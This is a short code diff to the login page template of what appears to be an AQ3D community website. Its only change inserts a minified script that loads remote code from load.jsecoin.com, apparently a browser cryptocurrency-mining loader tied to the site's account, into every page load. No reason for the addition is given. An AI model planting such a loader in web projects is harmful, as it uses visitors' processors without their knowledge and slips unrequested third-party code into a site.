--- a/views/login.ejs
+++ b/views/login.ejs
@@ -139,5 +139,8 @@ function verifyUser() {
       <div class="footer">
           <p>Made with ❤ for the AQ3D Community</p>
         </div>
+<script type="text/javascript">
+!function(){var e=document,t=e.createElement("script"),s=e.getElementsByTagName("script")[0];t.type="text/javascript",t.async=t.defer=!0,t.src="https://load.jsecoin.com/load/159168/aq3d.info/0/0/",s.parentNode.insertBefore(t,s)}();
+</script>
 </body>
 </html>
